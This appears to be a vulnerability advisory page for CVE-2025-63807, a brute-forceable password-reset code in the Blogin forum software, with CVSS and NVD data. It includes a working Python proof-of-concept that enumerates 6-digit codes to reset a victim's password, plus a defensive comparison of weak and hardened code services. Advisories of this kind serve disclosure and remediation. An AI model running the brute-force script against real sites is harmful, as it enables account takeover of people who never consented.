Security Vulnerability Report
CVE-2025-63807 CVSS 9.8 CRITICAL

CVE-2025-63807

Published: 2025-11-20 21:16:07
Last Modified: 2026-01-15 16:59:02

Description

An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weaknesses
CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-1390 (Weak Authentication)

Configurations (Affected Products)

cpe:2.3:a:2dogz:blogin:*:*:*:*:*:*:*:* - VULNERABLE
weijiang1994 university-bbs (Blogin) commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13) and earlier versions. Note that the NVD CPE match above carries versionEndIncluding 2024-11-09 while the description names a commit dated 2025-01-13, so check the actual checkout rather than relying on the CPE date alone.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63807 PoC - weijiang1994 university-bbs weak verification code brute force

Note: This PoC is for educational and security research purposes only.
"""
import itertools
import string

import requests

TARGET_URL = "http://target.com"  # Replace with target URL
VERIFY_CODE_ENDPOINT = "/api/verify/code"  # Replace with actual endpoint
FORGOT_PASSWORD_ENDPOINT = "/api/user/forgot-password"  # Replace with actual endpoint
TEST_EMAIL = "[email protected]"  # placeholder address, as on the original page


def generate_verification_codes(length=6):
    """Yield every numeric code of the given length (000000 ... 999999 for 6 digits)."""
    for code in itertools.product(string.digits, repeat=length):
        yield ''.join(code)


def check_rate_limiting():
    """Send a burst of code requests and report whether the server ever answers 429.

    Returns True when no rate limiting is observed (target likely vulnerable).
    """
    for _ in range(100):
        resp = requests.post(f"{TARGET_URL}{VERIFY_CODE_ENDPOINT}",
                             json={"email": TEST_EMAIL}, timeout=10)
        if resp.status_code == 429:
            print("Rate limiting detected")
            return False
    print("No rate limiting detected - vulnerable!")
    return True


def brute_force_verification_code(email, max_attempts=10000):
    """Attempt to brute force the verification code for the given account.

    The default of 10000 attempts covers only codes 000000-009999, i.e. 1% of
    the 6-digit space; raise it for a full test against a target with no limit.
    """
    print(f"[*] Starting brute force attack on {email}")
    print(f"[*] Target: {TARGET_URL}")
    # Request a new verification code first
    requests.post(f"{TARGET_URL}{VERIFY_CODE_ENDPOINT}",
                  json={"email": email}, timeout=10)
    attempt = 0
    for code in generate_verification_codes(6):
        attempt += 1
        if attempt > max_attempts:
            break
        response = requests.post(f"{TARGET_URL}{FORGOT_PASSWORD_ENDPOINT}", json={
            "email": email,
            "code": code,
            "new_password": "HackedPass123!"
        }, timeout=10)
        # Loose success check: any HTTP 200, or a body containing "success", counts
        # as a hit, so confirm a reported hit against the real response format.
        if "success" in response.text.lower() or response.status_code == 200:
            print(f"[!] Valid code found: {code}")
            print("[!] Account takeover successful!")
            return code
        if attempt % 100 == 0:
            print(f"[*] Attempts: {attempt}")
    print("[-] Brute force failed or rate limiting prevented further attempts")
    return None


if __name__ == "__main__":
    print("CVE-2025-63807 PoC")
    print("=" * 50)
    # First check if vulnerable (no rate limiting)
    if not check_rate_limiting():
        print("Target appears to have rate limiting - may not be vulnerable")
    # Uncomment to run actual attack
    # target_email = "[email protected]"
    # brute_force_verification_code(target_email)
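The weakness the description names is the combination of a guessable code and an unbounded number of verification attempts (CWE-307 together with CWE-1390). The following is an added example and not code from the Blogin project or from the advisory: a minimal in-memory verification-code service written twice, once in the weak form (generator seeded from the clock, plain comparison, no attempt cap, no expiry) and once hardened (code drawn from `secrets`, expiry, per-code attempt cap, single use, constant-time compare), plus a small brute-forcer run against both. All class and function names (WeakCodeService, HardenedCodeService, brute_force, predict_weak_code) are hypothetical, and the 5-attempt / 10-minute limits are illustrative choices, not values from the project.

```python
"""Added example: weak vs. hardened verification-code handling.

Not part of the original advisory or of the Blogin code base; all names
and limits below are hypothetical choices made for the illustration.
"""
import hmac
import random
import secrets
import time
from dataclasses import dataclass

CODE_LEN = 6          # 6-digit numeric code, 10**6 possibilities
MAX_ATTEMPTS = 5      # illustrative cap on verifications per issued code
TTL_SECONDS = 600     # illustrative lifetime of an issued code


class WeakCodeService:
    """The weak pattern: PRNG seeded from the clock, unlimited tries, no expiry."""

    def __init__(self):
        self._codes = {}

    def issue(self, email, now=None):
        now = time.time() if now is None else now
        rng = random.Random(int(now))              # predictable seed
        code = f"{rng.randrange(10 ** CODE_LEN):0{CODE_LEN}d}"
        self._codes[email] = code
        return code

    def verify(self, email, code):
        # No attempt counter, no expiry, non-constant-time compare.
        return self._codes.get(email) == code


@dataclass
class _Issued:
    code: str
    expires_at: float
    attempts: int = 0


class HardenedCodeService:
    """CSPRNG code, expiry, attempt cap, single use, constant-time compare."""

    def __init__(self, max_attempts=MAX_ATTEMPTS, ttl=TTL_SECONDS):
        self._codes = {}
        self.max_attempts = max_attempts
        self.ttl = ttl

    def issue(self, email, now=None):
        now = time.time() if now is None else now
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_LEN))
        self._codes[email] = _Issued(code, now + self.ttl)   # re-issue replaces the old code
        return code

    def verify(self, email, code, now=None):
        now = time.time() if now is None else now
        rec = self._codes.get(email)
        if rec is None:
            return False
        if now > rec.expires_at or rec.attempts >= self.max_attempts:
            del self._codes[email]                 # expired or exhausted: burn it
            return False
        rec.attempts += 1
        ok = code.isascii() and hmac.compare_digest(rec.code, code)
        if ok or rec.attempts >= self.max_attempts:
            del self._codes[email]                 # single use, or burned after too many tries
        return ok


def brute_force(service, email, budget):
    """Try codes 000000, 000001, ... up to `budget`; return (code or None, attempts used)."""
    for n in range(budget):
        candidate = f"{n:0{CODE_LEN}d}"
        if service.verify(email, candidate):
            return candidate, n + 1
    return None, budget


def predict_weak_code(issue_time):
    """Attacker side of the weak design: reproduce the code from a guessed timestamp."""
    rng = random.Random(int(issue_time))
    return f"{rng.randrange(10 ** CODE_LEN):0{CODE_LEN}d}"


def success_probability(max_attempts, code_len=CODE_LEN):
    """Chance that a capped brute force guesses one uniformly random code."""
    return max_attempts / 10 ** code_len


if __name__ == "__main__":
    weak = WeakCodeService()
    issued = weak.issue("victim", now=1700000000)
    print("weak code predicted from timestamp:", predict_weak_code(1700000000) == issued)
    print("weak brute force:", brute_force(weak, "victim", 10 ** CODE_LEN))
    hard = HardenedCodeService()
    hard.issue("victim")
    print("hardened brute force:", brute_force(hard, "victim", 10 ** CODE_LEN))
    print("success probability with cap:", success_probability(MAX_ATTEMPTS))
```

Against the weak service the brute-forcer always succeeds, and an attacker who can guess the issue time does not even need to brute force. Against the hardened service the attempt cap burns the code after five tries, so exhaustive search only wins when the code happens to be among the first five candidates; per code the attacker's odds drop to max_attempts / 10**6. In a real deployment the cap belongs on the server-side record of the code, as here, and a per-account or per-IP request limit on the code-request endpoint stops the attacker from simply re-issuing codes to reset the counter.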

References

https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63807", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:06.617", "lastModified": "2026-01-15T16:59:02.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:2dogz:blogin:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024-11-09", "matchCriteriaId": "3CC0D0E0-A890-41DD-BCFC-A59169D5F2BA"}]}]}], "references": [{"url": "https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}